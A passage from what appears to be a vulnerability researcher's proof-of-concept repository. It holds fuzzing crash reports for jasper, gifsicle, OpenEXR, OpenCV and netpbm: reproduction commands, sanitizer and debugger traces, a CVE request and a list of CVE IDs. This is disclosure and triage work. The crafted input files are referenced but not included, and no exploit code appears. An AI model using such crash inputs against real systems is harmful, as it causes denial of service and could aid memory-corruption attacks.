15 | Aborted 16 | ``` 17 | 18 | 19 | ### 003-jasper-aborted-3 20 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 21 | ``` 22 | warning: ignoring unknown marker segment (0xffff) 23 | type = 0xffff (UNKNOWN); len = 19;40 40 48 48 50 48 48 50 48 48 50 48 48 45 48 48 50 jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_t1cod.c:144: JPC_NOMINALGAIN: Assertio 24 | n `qmfbid == 0x01' failed. 25 | Aborted 26 | ``` 27 | 28 | ### 004-jasper-aborted-4 29 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 30 | ``` 31 | warning: trailing garbage in marker segment (15 bytes) 32 | jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_t1cod.c:144: JPC_NOMINALGAIN: Assertion `qmfbid == 0x01' failed. 33 | Aborted 34 | ``` 35 | 36 | ### 005-jasper-aborted-5 37 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 38 | ``` 39 | warning: ignoring trailing garbage (1 bytes) 40 | jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_dec.c:1883: jpc_dequantize: Assertion `absstepsize >= 0' failed. 41 | Aborted 42 | ``` 43 | 44 | ### 006-jasper-aborted-6 45 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 46 | ``` 47 | warning: ignoring unknown marker segment (0xff7e) 48 | type = 0xff7e (UNKNOWN); len = 20;01 40 40 ff ff 80 00 48 50 40 48 50 48 48 50 48 48 50 warning: trailing garbage in marker segment (1 bytes) 49 | warning: ignoring unknown marker segment (0xff0d) 50 | type = 0xff0d (UNKNOWN); len = 20;00 40 40 00 00 00 00 00 00 00 00 e9 00 ff 80 e9 00 00 jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_dec.c:1883: jpc_dequantize: Assertion `absstepsize >= 0' failed. 51 | Aborted 52 | ``` 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /gifsicle/readme.md: -------------------------------------------------------------------------------- 1 | gifsicle 2 | ============ 3 | 4 | 5 | ## 1. 
gifsicle --dither: SEGV (invalid read) in kc_distance during Floyd-Steinberg dithering 6 | Note: ASan reports a plain SEGV on an unknown address rather than a redzone hit, so the faulting pointer is not adjacent to any tracked heap allocation; the read errors printed before the trace show the input's image data had already been flagged as corrupt/truncated. Treat this as a crash (DoS) until the pointer/index computation in colormap_image_floyd_steinberg is triaged. 7 | ``` 8 | $ /gifsicle --dither --use-col=bw poc-1 -o /dev/null 9 | 10 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#1: read error: unknown block type 206 at file offset 161 11 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#0: read error: image corrupted, min_code_size too small 12 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#0: read error: image corrupted, code out of range (19 times) 13 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#0: read error: (not reporting more errors) 14 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#0: warning: 115 superfluous pixels of image data 15 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#1: read error: image corrupted, min_code_size too small 16 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#1: read error: image corrupted, code out of range (3 times) 17 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#1: read error: missing 16 pixels of image data 18 | ASAN:SIGSEGV 19 | ================================================================= 20 | ==74==ERROR: AddressSanitizer: SEGV on unknown address 0x61ae787a69f4 (pc 0x0000004ad06f bp 0x60300000ed42 sp 0x7fffffffd690 T0) 21 | #0 0x4ad06e in kc_distance ../../gifsicle/src/kcolor.h:113 22 | #1 0x4ad06e in colormap_image_floyd_steinberg ../../gifsicle/src/quantize.c:1149 23 | #2 0x4b3a07 in dither ../../gifsicle/src/quantize.c:1488 24 | #3 0x4b3a07 in colormap_stream ../../gifsicle/src/quantize.c:1613 25 | #4 0x4f4d3c in do_colormap_change ../../gifsicle/src/gifsicle.c:904 26 | #5 0x4f4d3c in merge_and_write_frames ../../gifsicle/src/gifsicle.c:1030 27 | #6 0x4f9116 in output_frames ../../gifsicle/src/gifsicle.c:1105 28 | #7 0x4096ec
in main ../../gifsicle/src/gifsicle.c:2173 29 | #8 0x7ffff659a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 30 | #9 0x40ae88 in _start (/src/aflbuild/installed/bin/gifsicle+0x40ae88) 31 | 32 | AddressSanitizer can not provide additional info. 33 | SUMMARY: AddressSanitizer: SEGV ../../gifsicle/src/kcolor.h:113 kc_distance 34 | ==74==ABORTING 35 | ``` 36 | -------------------------------------------------------------------------------- /cve-request/cve-request-2.txt: -------------------------------------------------------------------------------- 1 | Description: 2 | OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial 3 | Light & Magic for use in computer imaging applications. 4 | 5 | A crafted image causes a heap-buffer-overflow (an out-of-bounds 2-byte READ in hufDecode, reached while decompressing PIZ-compressed scanlines) in the latest release, 2.2.0. 6 | The issue also exists in the latest commit of the GitHub repo 7 | (https://github.com/openexr/openexr). 8 | 9 | 10 | 11 | The complete ASan output: 12 | ./exrmaketiled ./bug-testcase/185-openexr-heapoverflow /tmp/out 13 | ================================================================= 14 | ==18567==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63100003c7fe at pc 0x7fc23e95a5ab bp 0x7ffe0428e7e0 sp 0x7ffe0428e7d8 15 | READ of size 2 at 0x63100003c7fe thread T0 16 | #0 0x7fc23e95a5aa in hufDecode ../../openexr/OpenEXR/IlmImf/ImfHuf.cpp:898 17 | #1 0x7fc23e95a5aa in Imf_2_2::hufUncompress(char const*, int, unsigned short*, int) ../../openexr/OpenEXR/IlmImf/ImfHuf.cpp:1101 18 | #2 0x7fc23e971ca7 in Imf_2_2::PizCompressor::uncompress(char const*, int, Imath_2_2::Box >, char const*&) ../../openexr/OpenEXR/IlmImf/ImfPizCompressor.cpp:576 19 | #3 0x7fc23e974663 in Imf_2_2::PizCompressor::uncompress(char const*, int, int, char const*&) ../../openexr/OpenEXR/IlmImf/ImfPizCompressor.cpp:288 20 | #4 0x7fc23ea66bb7 in execute ../../openexr/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:544 21 | #5 0x7fc23d4081ea in IlmThread_2_2::ThreadPool::addTask(IlmThread_2_2::Task*)
../../openexr/IlmBase/IlmThread/IlmThreadPool.cpp:433 22 | #6 0x7fc23ea7c136 in Imf_2_2::ScanLineInputFile::readPixels(int, int) ../../openexr/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:1617 23 | #7 0x7fc23e904c7c in Imf_2_2::InputFile::readPixels(int, int) ../../openexr/OpenEXR/IlmImf/ImfInputFile.cpp:815 24 | #8 0x4236ed in makeTiled(char const*, char const*, int, Imf_2_2::LevelMode, Imf_2_2::LevelRoundingMode, Imf_2_2::Compression, int, int, std::set, std::allocator > const&, Extrapolation, Extrapolation, bool) ../../openexr/OpenEXR/exrmaketiled/makeTiled.cpp:572 25 | #9 0x405283 in main ../../openexr/OpenEXR/exrmaketiled/main.cpp:426 26 | #10 0x7fc23dd55f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 27 | #11 0x40692c (/data/xqx/tests/openexr-test/aflbuild/build-openexr/install/bin/exrmaketiled+0x40692c) 28 | 29 | 30 | 31 | 32 | Affected version: 33 | the Latest version 2.2.0, and also in the latest commit 1cce277. 34 | 35 | Fixed version: 36 | N/A 37 | 38 | Commit fix: 39 | N/A 40 | 41 | Credit: 42 | the bug is found by Qixue Xiao and Kang Li. 43 | 44 | 45 | CVE: 46 | N/A 47 | 48 | Reproducer: 49 | https://github.com/xiaoqx/pocs/blob/master/openexr.md 50 | https://github.com/xiaoqx/pocs/blob/master/openexr/185-openexr-heapoverflow 51 | 52 | Timeline: 53 | 2017-07-29: bug discovered and reported upstream 54 | https://github.com/openexr/openexr/issues/238 55 | 56 | 57 | Note: 58 | This bug was found with American Fuzzy Lop. 
59 | 60 | 61 | -- 62 | xiaoqixue_1@163.com 63 | 64 | 65 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | pocs of tested targets 2 | ================= 3 | 4 | this work done with 360 TeamSeri0us 5 | 6 | ## opencv 7 | 8 | ### CVE-2017-12597 9 | ### CVE-2017-12598 10 | ### CVE-2017-12599 11 | ### CVE-2017-12600 12 | ### CVE-2017-12601 13 | ### CVE-2017-12602 14 | ### CVE-2017-12603 15 | ### CVE-2017-12604 16 | ### CVE-2017-12605 17 | ### CVE-2017-12606 18 | ### CVE-2017-14136 19 | 20 | 21 | ## libjasper 22 | ### CVE-2017-9782 23 | 24 | ## openEXR 25 | ### CVE-2017-12596 26 | 27 | ## wave.py (python) 28 | ### CVE-2017-14144 29 | 30 | ## numpy 31 | ### CVE-2017-12852 32 | 33 | ## hdf5 34 | 35 | ### CVE-2017-17505 36 | ### CVE-2017-17506 37 | ### CVE-2017-17507 38 | ### CVE-2017-17508 39 | ### CVE-2017-17509 40 | 41 | ## libtiff 42 | ### CVE-2018-7456 43 | 44 | ## cimg 45 | 46 | ### CVE-2018-7587. 47 | ### CVE-2018-7588. 48 | ### CVE-2018-7589. 49 | ### CVE-2018-7637. 50 | ### CVE-2018-7638. 51 | ### CVE-2018-7639. 52 | ### CVE-2018-7640. 53 | ### CVE-2018-7641. 54 | 55 | ## opencv 56 | (assert-dos) 57 | ### CVE-2018-7712 58 | ### CVE-2018-7713 59 | ### CVE-2018-7714 60 | 61 | ## netpbm 62 | ### CVE-2018-8975. 63 | 64 | ## exiv2 65 | ### CVE-2018-8976. 66 | ### CVE-2018-8977 67 | 68 | ### CVE-2018-9144 69 | ### CVE-2018-9145 70 | ### CVE-2018-9146 71 | 72 | ## libjasper 73 | ### CVE-2018-9055(pwd) 74 | ### CVE-2018-9252(pwd) 75 | 76 | ## exiv2 77 | ### CVE-2018-9303. 78 | ### CVE-2018-9304. 79 | ### CVE-2018-9305. 80 | ### CVE-2018-9306. 81 | ### CVE-2018-12264 82 | ### CVE-2018-12265. 
83 | 84 | ## cms 85 | ### CVE-2018-11555 86 | ### CVE-2018-11556 87 | 88 | ## sam2p 89 | ### CVE-2018-12578 (pwd) 90 | ### CVE-2018-12601 (pwd) 91 | 92 | ## exempi 93 | 94 | ### CVE-2018-12648 95 | ### CVE-2018-13414 96 | 97 | ## mupdf 98 | ### CVE-2018-13413 99 | 100 | 101 | ## hdf5 102 | ### CVE-2018-13866. 103 | ### CVE-2018-13867. 104 | ### CVE-2018-13868. 105 | ### CVE-2018-13869. 106 | ### CVE-2018-13870. 107 | ### CVE-2018-13871. 108 | ### CVE-2018-13872. 109 | ### CVE-2018-13873. 110 | ### CVE-2018-13874. 111 | ### CVE-2018-13875. 112 | ### CVE-2018-13876. 113 | ### CVE-2018-14031. 114 | ### CVE-2018-14032. 115 | ### CVE-2018-14033. 116 | ### CVE-2018-14034. 117 | ### CVE-2018-14035. 118 | 119 | ## exiv2 120 | 121 | ### CVE-2018-14046 122 | 123 | 124 | ## libSoundTouch 125 | 126 | ### CVE-2018-14044 127 | ### CVE-2018-14045 128 | 129 | ## gegl 130 | 131 | ### CVE-2018-10111 132 | ### CVE-2018-10112 133 | ### CVE-2018-10113 134 | ### CVE-2018-10114 135 | 136 | ## hdf5 137 | 138 | ### CVE-2018-13866. 139 | ### CVE-2018-13867. 140 | ### CVE-2018-13868. 141 | ### CVE-2018-13869. 142 | ### CVE-2018-13870. 143 | ### CVE-2018-13871. 144 | ### CVE-2018-13872. 145 | ### CVE-2018-13873. 146 | ### CVE-2018-13874. 147 | ### CVE-2018-13875. 148 | ### CVE-2018-13876. 149 | ### CVE-2018-14031. 150 | ### CVE-2018-14032. 151 | ### CVE-2018-14033. 152 | ### CVE-2018-14034. 153 | ### CVE-2018-14035. 154 | 155 | ## libgig 156 | 157 | ### CVE-2018-14449. 158 | ### CVE-2018-14450. 159 | ### CVE-2018-14451. 160 | ### CVE-2018-14452. 161 | ### CVE-2018-14453. 162 | ### CVE-2018-14454. 163 | ### CVE-2018-14455. 164 | ### CVE-2018-14456. 165 | ### CVE-2018-14457. 166 | ### CVE-2018-14458. 167 | ### CVE-2018-14459. 168 | ### CVE-2018-14460. 
169 | 170 | 171 | 172 | 173 | -------------------------------------------------------------------------------- /opencv/dos-by-assert/readme.md: -------------------------------------------------------------------------------- 1 | DoS by assert in the OpenCV library 2 | ================== 3 | Each PoC carries image dimensions that fail the size assertions in validateInputImageSize (width and height <= 1<<20, pixels <= 1<<30). The failed assertion throws cv::Exception; the test driver below does not catch it, so std::terminate aborts the process (SIGABRT). Callers that wrap imread in a try/catch for cv::Exception are not terminated, so the impact is an uncaught-exception DoS in unguarded consumers, not memory corruption. 4 | ## 1. opencv-assert-dos-1 5 | 6 | ``` 7 | Starting program: /work/test-driver/opencv_test.elf ../crashes/dos-1 8 | [Thread debugging using libthread_db enabled] 9 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 10 | OpenCV(3.4.1-dev) Error: Assertion failed (pixels <= (1<<30)) in validateInputImageSize, file /src/opencv/modules/imgcodecs/src/loadsave.cpp, line 74 11 | terminate called after throwing an instance of 'cv::Exception' 12 | what(): OpenCV(3.4.1-dev) /src/opencv/modules/imgcodecs/src/loadsave.cpp:74: error: (-215) pixels <= (1<<30) in function validateInputImageSize 13 | 14 | 15 | Program received signal SIGABRT, Aborted. 16 | 0x00007ffff1d52428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 17 | 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. 18 | (gdb) bt 19 | #0 0x00007ffff1d52428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 20 | #1 0x00007ffff1d5402a in __GI_abort () at abort.c:89 21 | #2 0x00007ffff238c84d in __gnu_cxx::__verbose_terminate_handler() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 22 | #3 0x00007ffff238a6b6 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 23 | #4 0x00007ffff238a701 in std::terminate() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 24 | #5 0x00007ffff238a919 in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 25 | #6 0x00007ffff27ef928 in cv::error (exc=...)
at /src/opencv/modules/core/src/system.cpp:914 26 | #7 0x00007ffff27efcc1 in cv::error (_code=_code@entry=-215, _err=..., _func=_func@entry=0x7ffff7875b30 const&)::__func__> "validateInputImageSize", 27 | _file=_file@entry=0x7ffff7875818 "/src/opencv/modules/imgcodecs/src/loadsave.cpp", _line=_line@entry=74) at /src/opencv/modules/core/src/system.cpp:919 28 | #8 0x00007ffff7228af1 in cv::validateInputImageSize (size=...) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:74 29 | #9 0x00007ffff722dd1b in cv::imread_ (filename=..., flags=flags@entry=1, hdrtype=hdrtype@entry=2, mat=mat@entry=0x7fffffffe4a0) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:451 30 | #10 0x00007ffff72302bd in cv::imread (filename=..., flags=1) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:641 31 | #11 0x0000000000400e69 in main () 32 | ``` 33 | 34 | ## 2. opencv-assert-dos-2 35 | 36 | ``` 37 | Starting program: /work/test-driver/opencv_test.elf ../crashes/dos-2 38 | [Thread debugging using libthread_db enabled] 39 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 40 | OpenCV(3.4.1-dev) Error: Assertion failed (size.width <= (1<<20)) in validateInputImageSize, file /src/opencv/modules/imgcodecs/src/loadsave.cpp, line 70 41 | terminate called after throwing an instance of 'cv::Exception' 42 | what(): OpenCV(3.4.1-dev) /src/opencv/modules/imgcodecs/src/loadsave.cpp:70: error: (-215) size.width <= (1<<20) in function validateInputImageSize 43 | 44 | 45 | Program received signal SIGABRT, Aborted. 46 | 0x00007ffff1d52428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 47 | 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. 
48 | (gdb) bt 49 | #0 0x00007ffff1d52428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 50 | #1 0x00007ffff1d5402a in __GI_abort () at abort.c:89 51 | #2 0x00007ffff238c84d in __gnu_cxx::__verbose_terminate_handler() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 52 | #3 0x00007ffff238a6b6 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 53 | #4 0x00007ffff238a701 in std::terminate() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 54 | #5 0x00007ffff238a919 in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 55 | #6 0x00007ffff27ef928 in cv::error (exc=...) at /src/opencv/modules/core/src/system.cpp:914 56 | #7 0x00007ffff27efcc1 in cv::error (_code=_code@entry=-215, _err=..., _func=_func@entry=0x7ffff7875b30 const&)::__func__> "validateInputImageSize", 57 | _file=_file@entry=0x7ffff7875818 "/src/opencv/modules/imgcodecs/src/loadsave.cpp", _line=_line@entry=70) at /src/opencv/modules/core/src/system.cpp:919 58 | #8 0x00007ffff7228bf0 in cv::validateInputImageSize (size=...) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:70 59 | #9 0x00007ffff722dd1b in cv::imread_ (filename=..., flags=flags@entry=1, hdrtype=hdrtype@entry=2, mat=mat@entry=0x7fffffffe4a0) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:451 60 | #10 0x00007ffff72302bd in cv::imread (filename=..., flags=1) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:641 61 | #11 0x0000000000400e69 in main () 62 | 63 | 64 | ``` 65 | 66 | 67 | 68 | 69 | 70 | ## 3. opencv-assert-dos-3 71 | 72 | ``` 73 | Starting program: /work/test-driver/opencv_test.elf ../crashes/dos-3 74 | [Thread debugging using libthread_db enabled] 75 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 
76 | OpenCV(3.4.1-dev) Error: Assertion failed (size.height <= (1<<20)) in validateInputImageSize, file /src/opencv/modules/imgcodecs/src/loadsave.cpp, line 72 77 | terminate called after throwing an instance of 'cv::Exception' 78 | what(): OpenCV(3.4.1-dev) /src/opencv/modules/imgcodecs/src/loadsave.cpp:72: error: (-215) size.height <= (1<<20) in function validateInputImageSize 79 | 80 | 81 | Program received signal SIGABRT, Aborted. 82 | 0x00007ffff1d52428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 83 | 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. 84 | (gdb) bt 85 | #0 0x00007ffff1d52428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 86 | #1 0x00007ffff1d5402a in __GI_abort () at abort.c:89 87 | #2 0x00007ffff238c84d in __gnu_cxx::__verbose_terminate_handler() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 88 | #3 0x00007ffff238a6b6 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 89 | #4 0x00007ffff238a701 in std::terminate() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 90 | #5 0x00007ffff238a919 in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 91 | #6 0x00007ffff27ef928 in cv::error (exc=...) at /src/opencv/modules/core/src/system.cpp:914 92 | #7 0x00007ffff27efcc1 in cv::error (_code=_code@entry=-215, _err=..., _func=_func@entry=0x7ffff7875b30 const&)::__func__> "validateInputImageSize", 93 | _file=_file@entry=0x7ffff7875818 "/src/opencv/modules/imgcodecs/src/loadsave.cpp", _line=_line@entry=72) at /src/opencv/modules/core/src/system.cpp:919 94 | #8 0x00007ffff7228b75 in cv::validateInputImageSize (size=...) 
at /src/opencv/modules/imgcodecs/src/loadsave.cpp:72 95 | #9 0x00007ffff722dd1b in cv::imread_ (filename=..., flags=flags@entry=1, hdrtype=hdrtype@entry=2, mat=mat@entry=0x7fffffffe4a0) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:451 96 | #10 0x00007ffff72302bd in cv::imread (filename=..., flags=1) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:641 97 | #11 0x0000000000400e69 in main () 98 | 99 | 100 | ``` 101 | 102 | 103 | 104 | 105 | -------------------------------------------------------------------------------- /netpbm/readme.md: -------------------------------------------------------------------------------- 1 | pocs of netpbm 2 | ======================== 3 | 4 | ## 1. pstopnm-divbyzero-1 5 | 6 | A division by zero in the pstopnm tool causes a denial of service (SIGFPE). 7 | The fault is in the computeSizeResBlind function: imageHeight is 0 (apparently derived from the crafted input's bounding box; see the borderedBox argument in frame #1) and is used as a divisor when the resolution is computed at pstopnm.c:313. 8 | 9 | 10 | ``` 11 | $ gdb --args pstopnm ./pstopnm-divbyzero-1 12 | 13 | Starting program: /src/netpbm-trunk/converter/other/pstopnm /work/pstopnm-divbyzero-1 14 | [Thread debugging using libthread_db enabled] 15 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 16 | 17 | Program received signal SIGFPE, Arithmetic exception. 18 | 0x0000000000402dd6 in computeSizeResBlind (xmax=612, ymax=792, imageWidth=165, imageHeight=0, nocrop=false, imageDimP=0x7fffffffe450) at pstopnm.c:313 19 | 313 imageDimP->xres = imageDimP->yres = MIN(xmax * 72 / imageWidth, 20 | (gdb) bt 21 | #0 0x0000000000402dd6 in computeSizeResBlind (xmax=612, ymax=792, imageWidth=165, imageHeight=0, nocrop=false, imageDimP=0x7fffffffe450) at pstopnm.c:313 22 | #1 0x00000000004030ab in computeSizeRes (cmdline=..., borderedBox=..., imageDimP=0x7fffffffe450) at pstopnm.c:369 23 | #2 0x00000000004044b8 in main (argc=2, argv=0x7fffffffe5c8) at pstopnm.c:1032 24 | 25 | ``` 26 | 27 | ## 2.
pstopnm-divbyzero-2 28 | 29 | 30 | ``` 31 | $ gdb --args pstopnm ./pstopnm-divbyzero-2 32 | 33 | [Thread debugging using libthread_db enabled] 34 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 35 | pstopnm: Writing ppmraw format 36 | 37 | Program received signal SIGFPE, Arithmetic exception. 38 | 0x000000000040374e in writePstrans (box=..., d=..., orientation=LANDSCAPE, pipeToGsP=0x61600000f680) at pstopnm.c:633 39 | 633 llx = box.llx - (xsize * 72 / xres - (box.urx - box.llx)) / 2; 40 | (gdb) pstopnm: execl() of Ghostscript ('/usr/bin/gs') failed, errno=2 (No such file or directory) 41 | 42 | (gdb) bt 43 | #0 0x000000000040374e in writePstrans (box=..., d=..., orientation=LANDSCAPE, pipeToGsP=0x61600000f680) at pstopnm.c:633 44 | #1 0x0000000000403f5a in feedPsToGhostScript (inputFileName=0x60300000efe0 "/work/pstopnm-divbyzero-2", borderedBox=..., imageDim=..., orientation=LANDSCAPE, 45 | pipeToGhostscriptFd=4, language=COMMON_POSTSCRIPT) at pstopnm.c:868 46 | #2 0x000000000040426e in executeGhostscript (inputFileName=0x60300000efe0 "/work/pstopnm-divbyzero-2", borderedBox=..., imageDim=..., orientation=LANDSCAPE, 47 | ghostscriptDevice=0x60200000eff0 "ppmraw", outfileArg=0x60400000dfd0 "/work/pstopnm-divbyzero-2%03d.ppm", textalphabits=4, language=COMMON_POSTSCRIPT) 48 | at pstopnm.c:971 49 | #3 0x0000000000404569 in main (argc=2, argv=0x7fffffffe5c8) at pstopnm.c:1041 50 | ``` 51 | 52 | ## 3. 
tifftopnm-heapoverflow-1 52 | The trace is not symbolized (`??:0`), but the ASan allocation info shows a 1-byte READ 0 bytes past the end of a 4-byte heap region, i.e. an off-by-one heap over-read in tifftopnm; rebuild with debug info to recover the source location. 53 | ``` 54 | $ tifftopnm ./tifftopnm-heapoverflow-1 55 | 56 | ==19==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ef14 at pc 0x000000405402 bp 0x7fff16aa45f0 sp 0x7fff16aa45e0 57 | READ of size 1 at 0x60200000ef14 thread T0 58 | #0 0x405401 (/src/aflbuild/installed/bin/tifftopnm+0x405401) 59 | #1 0x406b91 (/src/aflbuild/installed/bin/tifftopnm+0x406b91) 60 | #2 0x403115 (/src/aflbuild/installed/bin/tifftopnm+0x403115) 61 | #3 0x7ffb37fb082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 62 | #4 0x4039e8 (/src/aflbuild/installed/bin/tifftopnm+0x4039e8) 63 | 64 | 0x60200000ef14 is located 0 bytes to the right of 4-byte region [0x60200000ef10,0x60200000ef14) 65 | allocated by thread T0 here: 66 | #0 0x7ffb3895e602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) 67 | #1 0x4063ae (/src/aflbuild/installed/bin/tifftopnm+0x4063ae) 68 | 69 | SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ?? 70 | Shadow bytes around the buggy address: 71 | 0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 72 | 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 73 | 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 74 | 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 75 | 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 76 | =>0x0c047fff9de0: fa fa[04]fa fa fa fd fa fa fa fd fa fa fa fd fa 77 | 0x0c047fff9df0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa 00 00 78 | 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 79 | 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 80 | 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 81 | 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 82 | Shadow byte legend (one shadow byte represents 8 application bytes): 83 | Addressable: 00 84 | Partially addressable: 01 02 03 04 05 06 07 85 | Heap left redzone: fa 86 | Heap right redzone: fb 87 | Freed heap
region: fd 89 | Stack left redzone: f1 90 | Stack mid redzone: f2 91 | Stack right redzone: f3 92 | Stack partial redzone: f4 93 | Stack after return: f5 94 | Stack use after scope: f8 95 | Global redzone: f9 96 | Global init order: f6 97 | Poisoned by user: f7 98 | Container overflow: fc 99 | Array cookie: ac 100 | Intra object redzone: bb 101 | ASan internal: fe 102 | ==19==ABORTING 103 | 104 | ``` 105 | ## 4. pbmmask-heapoverflow-1 106 | 107 | ``` 108 | $ gdb --args pbmmask $POC 109 | 110 | ==28==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efef at pc 0x00000040527d bp 0x7fffffffe4f0 sp 0x7fffffffe4e0 111 | READ of size 1 at 0x60200000efef thread T0 112 | #0 0x40527c (/src/aflbuild/installed/bin/pbmmask+0x40527c) 113 | #1 0x7ffff67c882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 114 | #2 0x405548 (/src/aflbuild/installed/bin/pbmmask+0x405548) 115 | 116 | 0x60200000efef is located 1 bytes to the left of 1-byte region [0x60200000eff0,0x60200000eff1) 117 | allocated by thread T0 here: 118 | #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) 119 | #1 0x7ffff6c1d704 in mallocz /src/netpbm/lib/util/mallocvar.c:15 120 | #2 0x7ffff6c1d704 in allocRowHeap /src/netpbm/lib/util/mallocvar.c:68 121 | #3 0x7ffff6c1d704 in pm_mallocarray2 /src/netpbm/lib/util/mallocvar.c:117 122 | #4 0x6075bf (/src/aflbuild/installed/bin/pbmmask+0x6075bf) 123 | 124 | SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ?? 
125 | Shadow bytes around the buggy address: 126 | 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 127 | 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 128 | 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 129 | 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 130 | 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 131 | =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa 01 fa fa[fa]01 fa 132 | 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 133 | 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 134 | 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 135 | 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 136 | 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 137 | Shadow byte legend (one shadow byte represents 8 application bytes): 138 | Addressable: 00 139 | Partially addressable: 01 02 03 04 05 06 07 140 | Heap left redzone: fa 141 | Heap right redzone: fb 142 | Freed heap region: fd 143 | Stack left redzone: 